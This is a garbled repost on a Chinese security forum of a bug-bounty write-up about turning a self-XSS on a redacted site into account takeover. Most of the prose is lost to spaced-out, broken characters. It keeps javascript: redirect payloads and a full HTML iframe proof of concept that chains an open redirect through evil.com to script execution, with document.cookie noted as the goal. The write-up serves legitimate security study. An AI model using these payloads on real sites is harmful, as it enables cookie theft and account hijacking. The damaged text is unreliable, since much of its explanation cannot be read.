[21665] 2021-02-10_如何使用SelfXSS导致账户接管

文档创建者:s7ckTeam
浏览次数:7
最后更新:2025-01-18
2021-02-10_如何使用SelfXSS导致账户接管 使 S e l f   X S S L e m o n S e c   2 0 2 1 - 0 2 - 1 0 K h a n                 /   " S E L F   X S S   "                 X S S                 西 4 K a r t i k S h a r m a X S S p s : D M                 h t t p s : / / r e d a c t e d . c o m / r e d i r e c t / < u r l - p a t h > h t t p s : / / r e d a c t e d . c o m / r e d i r e c t / j a v a s c r i p t : a l e r t ( 1 ) h t t p s : / / r e d a c t e d . c o m / r e d i r e c t / j a v a s c r i p t : a l e r t ( 1 ) a l e r t ( 1 )
h t t p s : / / r e d a c t e d . c o m / r e d i r e c t / j a v a s c r i p t : a l e r t ( 1 ) 0 X S S r e g e x "   '   >   *   / > / # r e d i r e c t h t t p s : / / r e d a c t e d . c o m / r e d i r e c t / j a v a s c r i p t : a l e r t ( 1 ) X - F R A M E   O P T I O N S X - F R A M E   O P T I O N S j s   : D     j a v a s c r i p t i f r a m e j a v a s c r i p t h t m l < h t m l >     < h e a d >     < m e t a   h t t p - e q u i v = " C o n t e n t - T y p e "   c o n t e n t = " t e x t / h t m l ;   c h a r s e t = u t f - 8 "   / >                 < t i t l e > C h a n g i n g   P a g e s . . .   P l e a s e   W a i t < / t i t l e >         < / h e a d >         < b o d y >                 < i f r a m e   s r c = " "   n a m e = " f r a m e "   i d = " f r a m e "   w i d t h = " 1 0 0 % "   h e i g h t = " 1 0 0 % " > < / i f r a m e >                 < s c r i p t   t y p e = " t e x t / j a v a s c r i p t " >                         v a r   f r a m e s   =   A r r a y ( ' h t t p s : / / r e d a c t e d . c o m / # / r e d i r e c t / h t t p s : / / @ e v i l . c o m @ w w w . r e d a c t e d . c o m ' ,   3 ,                                 ' h t t p s : / / r e d a c t e d . c o m / # / r e d i r e c t / j a v a s c r i p t : a l e r t ( d o c u m e n t . d o m a i n ) ' ,   3 7 ) ;                         v a r   i   =   0 ,   l e n   =   f r a m e s . l e n g t h ;                         f u n c t i o n   C h a n g e S r c ( ) {                         d o c u m e n t . g e t E l e m e n t B y I d ( ' f r a m e ' ) . s r c   =   f r a m e s [ i + + ] ;                         i f   ( i   > =   l e n )   r e t u r n ;   / /   n o   m o r e   c h a n g i n g                         s e t T i m e o u t ( ' C h a n g e S r c ( ) ' ,   ( f r a m e s [ i + + ] * 1 0 0 0 ) ) ;                         }                         w i n d o w . o n l o a d   =   C h a n g e S r c ( ) ; < / s c r i p t >         < / b o d y > < / h t m l >
X - F r a m e - O p t i o n s i f r a m e i f r a m e C h a n g e S r c ( ) U R L   h t t p s : / / r e d a c t e d . c o m / # / r e d i r e c t / h t t p s : / / / / @ w w w . r e d a c t e d . c o m U R L h t t p s : / / r e d a c t e d . c o m / # / r e d i r e c t / j a v a s c r i p t : a l e r t ( d o c u m e n t . c o o k i e ) U R L X S S c o o k i e 访 / c o o k i e r e d a c t e d . c o m L e m o n S e c
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则